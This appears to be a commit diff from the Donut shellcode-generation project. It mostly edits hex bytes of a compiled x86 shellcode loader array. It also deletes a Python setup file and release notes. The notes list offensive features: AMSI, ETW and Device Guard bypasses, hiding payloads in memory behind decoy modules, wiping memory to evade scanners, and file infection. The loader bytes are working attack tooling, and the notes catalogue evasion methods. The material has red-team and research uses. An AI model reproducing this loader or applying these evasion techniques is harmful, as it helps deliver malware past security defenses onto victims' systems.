0x10, 0x50, 0x53, 0x8b, 0x11, 0x51, 0xff, 0x92, 0xb4, 0x00, 0x00, 0x00,
0xf7, 0xd8, 0x1b, 0xf6, 0x8b, 0x43, 0x0c, 0x33, 0xd2, 0x46, 0x8b, 0xca,
0x39, 0x95, 0x24, 0x05, 0x00, 0x00, 0x76, 0x13, 0x88, 0x94, 0x29, 0x28,
0x05, 0x00, 0x00, 0x88, 0x14, 0x08, 0x41, 0x3b, 0x8d, 0x24, 0x05, 0x00,
0x00, 0x72, 0xed, 0x53, 0xff, 0x97, 0xa4, 0x00, 0x00, 0x00, 0x8b, 0xc6,
0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0x14, 0x02, 0x00, 0x00, 0xc3, 0x81,
0xec, 0x38, 0x01, 0x00, 0x00, 0x53, 0x55, 0x56, 0x8b, 0xb4, 0x24, 0x48,
0x01, 0x00, 0x00, 0x57, 0xff, 0x76, 0x2c, 0xff, 0x76, 0x28, 0xff, 0x76,
@ -442,13 +449,13 @@ unsigned char LOADER_EXE_X86[] = {
0x00, 0x00, 0x45, 0x83, 0xc1, 0x04, 0x83, 0xc6, 0x08, 0x89, 0x4c, 0x24,
0x18, 0x3b, 0xaf, 0x3c, 0x02, 0x00, 0x00, 0x72, 0xb3, 0x8b, 0x87, 0x20,
0x09, 0x00, 0x00, 0x6a, 0x02, 0x5d, 0x3b, 0xc5, 0x75, 0x17, 0x57, 0xe8,
0x0f, 0xf1, 0xff, 0xff, 0x59, 0x85, 0xc0, 0x0f, 0x84, 0x66, 0x01, 0x00,
0xbb, 0xf0, 0xff, 0xff, 0x59, 0x85, 0xc0, 0x0f, 0x84, 0x66, 0x01, 0x00,
0x00, 0x8b, 0xb7, 0x60, 0x0d, 0x00, 0x00, 0xeb, 0x18, 0x83, 0xf8, 0x03,
0x0f, 0x84, 0x55, 0x01, 0x00, 0x00, 0x8d, 0xb7, 0x60, 0x0d, 0x00, 0x00,
0x83, 0xf8, 0x01, 0x74, 0x04, 0x8b, 0x74, 0x24, 0x1c, 0x83, 0xbf, 0x70,
0x05, 0x00, 0x00, 0x01, 0x74, 0x2e, 0x57, 0xe8, 0x73, 0xef, 0xff, 0xff,
0x05, 0x00, 0x00, 0x01, 0x74, 0x2e, 0x57, 0xe8, 0x1f, 0xef, 0xff, 0xff,
0x59, 0x85, 0xc0, 0x75, 0x0c, 0x39, 0xaf, 0x70, 0x05, 0x00, 0x00, 0x0f,
0x84, 0x26, 0x01, 0x00, 0x00, 0x57, 0xe8, 0x57, 0xf0, 0xff, 0xff, 0x59,
0x84, 0x26, 0x01, 0x00, 0x00, 0x57, 0xe8, 0x03, 0xf0, 0xff, 0xff, 0x59,
0x85, 0xc0, 0x75, 0x0c, 0x39, 0xaf, 0x70, 0x05, 0x00, 0x00, 0x0f, 0x84,
0x0f, 0x01, 0x00, 0x00, 0x83, 0x7e, 0x08, 0x01, 0x0f, 0x84, 0x9c, 0x00,
0x00, 0x00, 0x8b, 0x86, 0x24, 0x05, 0x00, 0x00, 0x6a, 0x04, 0x05, 0x2f,
@ -468,9 +475,9 @@ unsigned char LOADER_EXE_X86[] = {
0x83, 0x3e, 0x01, 0x74, 0x17, 0x39, 0x2e, 0x74, 0x13, 0x83, 0x3e, 0x05,
0x74, 0x05, 0x83, 0x3e, 0x06, 0x75, 0x41, 0x56, 0x57, 0xe8, 0x8f, 0x0c,
0x00, 0x00, 0xeb, 0x36, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x56, 0x57, 0xe8,
0xd4, 0xfa, 0xff, 0xff, 0x83, 0xc4, 0x0c, 0x85, 0xc0, 0x74, 0x0f, 0x8d,
0x80, 0xfa, 0xff, 0xff, 0x83, 0xc4, 0x0c, 0x85, 0xc0, 0x74, 0x0f, 0x8d,
0x44, 0x24, 0x24, 0x50, 0x56, 0x57, 0xe8, 0xa0, 0x00, 0x00, 0x00, 0x83,
0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x57, 0xe8, 0x7f, 0xf5, 0xff,
0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x57, 0xe8, 0x2b, 0xf5, 0xff,
0xff, 0xeb, 0x07, 0x56, 0x57, 0xe8, 0xe9, 0x03, 0x00, 0x00, 0x59, 0x59,
0x83, 0xbf, 0x30, 0x02, 0x00, 0x00, 0x03, 0x75, 0x02, 0xeb, 0xfe, 0x8b,
0x6c, 0x24, 0x10, 0x8b, 0x87, 0x20, 0x09, 0x00, 0x00, 0x83, 0xf8, 0x02,
@ -630,7 +637,7 @@ unsigned char LOADER_EXE_X86[] = {
0x85, 0xc9, 0x74, 0x71, 0x8b, 0x6c, 0x24, 0x38, 0x8b, 0xb4, 0x24, 0x58,
0x03, 0x00, 0x00, 0x79, 0x0c, 0x51, 0x6a, 0x00, 0x55, 0x53, 0xe8, 0xa4,
0x09, 0x00, 0x00, 0xeb, 0x32, 0x8d, 0x7a, 0x02, 0x03, 0xf9, 0x83, 0x7e,
0x04, 0x00, 0x74, 0x19, 0x57, 0x53, 0xe8, 0x93, 0xf2, 0xff, 0xff, 0x59,
0x04, 0x00, 0x74, 0x19, 0x57, 0x53, 0xe8, 0x3f, 0xf2, 0xff, 0xff, 0x59,
0x59, 0x85, 0xc0, 0x74, 0x0c, 0x8b, 0x83, 0x08, 0x01, 0x00, 0x00, 0x8b,
0x7c, 0x24, 0x20, 0xeb, 0x11, 0x6a, 0x00, 0x57, 0x55, 0x53, 0xe8, 0x74,
0x09, 0x00, 0x00, 0x8b, 0x7c, 0x24, 0x30, 0x83, 0xc4, 0x10, 0x89, 0x07,
@ -743,10 +750,10 @@ unsigned char LOADER_EXE_X86[] = {
0x00, 0x8b, 0x88, 0x24, 0x05, 0x00, 0x00, 0x05, 0x28, 0x05, 0x00, 0x00,
0x03, 0xc9, 0x51, 0x55, 0x6a, 0xff, 0x50, 0x56, 0x56, 0xff, 0x53, 0x50,
0x8d, 0x44, 0x24, 0x58, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x44, 0x24, 0x14,
0x50, 0x53, 0xe8, 0xa5, 0xdf, 0xff, 0xff, 0x8d, 0x44, 0x24, 0x4c, 0x89,
0x44, 0x24, 0x24, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x53, 0xe8, 0x48, 0xde,
0x50, 0x53, 0xe8, 0x51, 0xdf, 0xff, 0xff, 0x8d, 0x44, 0x24, 0x4c, 0x89,
0x44, 0x24, 0x24, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x53, 0xe8, 0xf4, 0xdd,
0xff, 0xff, 0x8d, 0x84, 0x24, 0x94, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24,
0x38, 0x8d, 0x44, 0x24, 0x38, 0x50, 0x53, 0xe8, 0xdb, 0xe9, 0xff, 0xff,
0x38, 0x8d, 0x44, 0x24, 0x38, 0x50, 0x53, 0xe8, 0x87, 0xe9, 0xff, 0xff,
0x83, 0xc4, 0x18, 0x56, 0x56, 0xff, 0x93, 0xec, 0x00, 0x00, 0x00, 0x85,
0xc0, 0x0f, 0x85, 0xf5, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x0c, 0x50,
0x8d, 0x83, 0xd0, 0x08, 0x00, 0x00, 0x50, 0x6a, 0x03, 0x56, 0x8d, 0x83,
@ -808,12 +815,12 @@ unsigned char LOADER_EXE_X86[] = {
0x24, 0x8b, 0xf0, 0x83, 0xc4, 0x10, 0x85, 0xf6, 0x0f, 0x84, 0x75, 0xff,
0xff, 0xff, 0x85, 0xed, 0x74, 0x33, 0x83, 0x7c, 0x24, 0x10, 0x00, 0x74,
0x10, 0xff, 0xd6, 0x8b, 0x54, 0x24, 0x14, 0x8b, 0xf0, 0x85, 0xf6, 0x0f,
0x84, 0x5a, 0xff, 0xff, 0xff, 0xff, 0x36, 0x53, 0xe8, 0x9a, 0xea, 0xff,
0x84, 0x5a, 0xff, 0xff, 0xff, 0xff, 0x36, 0x53, 0xe8, 0x46, 0xea, 0xff,
0xff, 0x8b, 0x54, 0x24, 0x1c, 0x59, 0x59, 0x85, 0xc0, 0x0f, 0x84, 0x44,
0xff, 0xff, 0xff, 0x8b, 0x44, 0x24, 0x20, 0xeb, 0x34, 0x83, 0x7c, 0x24,
0x10, 0x00, 0x74, 0x10, 0xff, 0xd6, 0x8b, 0x54, 0x24, 0x14, 0x8b, 0xf0,
0x85, 0xf6, 0x0f, 0x84, 0x27, 0xff, 0xff, 0xff, 0xff, 0x36, 0x53, 0xe8,
0x67, 0xea, 0xff, 0xff, 0x8b, 0x54, 0x24, 0x1c, 0x59, 0x59, 0x85, 0xc0,
0x13, 0xea, 0xff, 0xff, 0x8b, 0x54, 0x24, 0x1c, 0x59, 0x59, 0x85, 0xc0,
0x0f, 0x84, 0x11, 0xff, 0xff, 0xff, 0x8b, 0x44, 0x24, 0x18, 0x8b, 0x40,
0x04, 0x8b, 0x54, 0x24, 0x14, 0x89, 0x06, 0xe9, 0xff, 0xfe, 0xff, 0xff,
0x8b, 0x3f, 0x8d, 0x83, 0x70, 0x03, 0x00, 0x00, 0x83, 0x7f, 0x18, 0x00,
@ -860,14 +867,14 @@ unsigned char LOADER_EXE_X86[] = {
0x8a, 0x01, 0x42, 0x88, 0x04, 0x0e, 0x41, 0x80, 0x39, 0x00, 0x75, 0xef,
0x8d, 0x44, 0x24, 0x60, 0xc6, 0x44, 0x14, 0x60, 0x00, 0x50, 0x8d, 0x44,
0x24, 0x24, 0x50, 0x57, 0xff, 0xb4, 0x24, 0xb0, 0x00, 0x00, 0x00, 0xe8,
0xd4, 0xe2, 0xff, 0xff, 0x83, 0xc4, 0x10, 0x8b, 0xf0, 0x8b, 0xc6, 0xeb,
0x80, 0xe2, 0xff, 0xff, 0x83, 0xc4, 0x10, 0x8b, 0xf0, 0x8b, 0xc6, 0xeb,
0x16, 0x8b, 0x84, 0x24, 0xb0, 0x00, 0x00, 0x00, 0x2b, 0x43, 0x10, 0x8b,
0x34, 0x82, 0x03, 0xf7, 0xe9, 0x6e, 0xff, 0xff, 0xff, 0x33, 0xc0, 0x5f,
0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0x90, 0x00, 0x00, 0x00, 0xc3, 0x55, 0x8b,
0xec, 0x64, 0xa1, 0x18, 0x00, 0x00, 0x00, 0x33, 0xc9, 0x56, 0x8b, 0x40,
0x30, 0x8b, 0x40, 0x0c, 0x8b, 0x70, 0x0c, 0xeb, 0x20, 0x85, 0xc9, 0x75,
0x23, 0xff, 0x75, 0x18, 0xff, 0x75, 0x14, 0xff, 0x75, 0x10, 0xff, 0x75,
0x0c, 0x50, 0xff, 0x75, 0x08, 0xe8, 0xd5, 0xe0, 0xff, 0xff, 0x8b, 0x36,
0x0c, 0x50, 0xff, 0x75, 0x08, 0xe8, 0x81, 0xe0, 0xff, 0xff, 0x8b, 0x36,
0x83, 0xc4, 0x18, 0x8b, 0xc8, 0x8b, 0x46, 0x18, 0x85, 0xc0, 0x75, 0xd9,
0x8b, 0xc1, 0x5e, 0x5d, 0xc3, 0x83, 0xec, 0x14, 0x53, 0x8b, 0x5c, 0x24,
0x24, 0x33, 0xc0, 0x55, 0x56, 0x33, 0xed, 0x89, 0x44, 0x24, 0x0c, 0x57,

59
setup.py
View File

@ -1,59 +0,0 @@
from setuptools import Extension, setup
import sys
with open("README.md", "r") as fh:
long_description = fh.read()
static_libraries = ['aplib64']
static_lib_dir = 'lib'
libraries = []
library_dirs = ['lib']
extra_compile_args = []
extra_link_args = []
extra_objects = []
include_dirs = ['include']
sources = ['donut.c',
'hash.c',
'encrypt.c',
'format.c',
'loader/clib.c',
'donutmodule.c']
if sys.platform == 'win32':
libraries.extend(static_libraries)
library_dirs.append(static_lib_dir)
extra_objects = []
elif sys.platform == 'win64':
libraries.extend(static_libraries)
library_dirs.append(static_lib_dir)
extra_objects = []
else: # POSIX
extra_objects = ['{}/{}.a'.format(static_lib_dir, l) for l in static_libraries]
module = Extension(
"donut",
include_dirs = include_dirs,
sources = sources,
libraries = libraries,
library_dirs = library_dirs,
extra_compile_args = extra_compile_args,
extra_link_args = extra_link_args,
extra_objects = extra_objects,
)
setup(
name='donut-shellcode',
version='1.0.2',
description='Donut shellcode Python C extension',
long_description=long_description,
long_description_content_type="text/markdown",
license="BSD-3",
author_email="therealwover@protonmail.com",
url='https://github.com/TheWover/donut',
author='TheWover, Odzhan, byt3bl33d3r',
include_package_data=True,
zip_safe=True,
ext_modules=[module],
python_requires='>=3.0',
)

36
version-release-notes.txt
View File

@ -1,36 +0,0 @@
* v0.9.1:
* Dual-Mode shellcode that can run in either x64 for x86 (WOW64) processes.
* Automatic detection of the CLR version required for .NET Assembly payloads.
* AMSI bypassing for version .NET 4.8 that ensure all Assemblies can be safely loaded.
* Modular system for adding bypasses. Your choide of bypass functionality is compiled into payload.exe based on compiler flags.
* Bypass for Device Guard policy preventing execution of dynamically generated .NET code
* Better handling of Main functions (Entry Points) that use an object array containing string arrays, rather than an array of strings
* v1.0:
* Added module overloading for native PE payloads. Hides them in MEM_IMAGE memory backed by a decoy file on disk
* Added an option to block indefinitely after running the payload
* Added Dockerfile to create a docker image for generating donut shellcode
* Added support for binaries without relocation information or with certain edge cases for relocation information
* Added custom GetProcAddress and LoadLibrary replacement functions that will only call those Win32 API calls as fallbacks
* Better documentation for debugging, designing with, and integrating Donut.
* Added moduler bypass system for ETW
* Change the -y parameter to be an offset, relative to the base address of the host process's executable. This supports using donut for file infection (like BackdoorFactory).
* Added option for preserving or overwriting PE headers of native payloads
* When Module Overloading and PE header overwritten are enabled, the payload's headers will be overwritten by those of the decoy module
* Added support for HTTP Basic Authentication with remote modules
* Native PE Section permissions are more accurate
* Fixed some issues with the MingW makefile (#96)
* Fixed and improved all makefiles
* Added an X86 MSVC makefile (Makefile_x86.msvc) for ease of use
* Fixed the Python module
* Added an inject_local.exe that runs shellcode in the current process for testing purposes
* C# output generator
* Python output generator
* UUID string output generator
* NTHeaders->OptionalHeader->ImageBase is now updated correctly
* Sections' PhysicalAddress is now updated correctly
* Much more detailed debugging output
* Better wiping of data in memory to evade scanners
* Improved error handling
* Default AppDomain is now used when entropy is disabled
* Updated reference to go-donut
* Stack pointer is now correctly aligned (Kyle Willmon)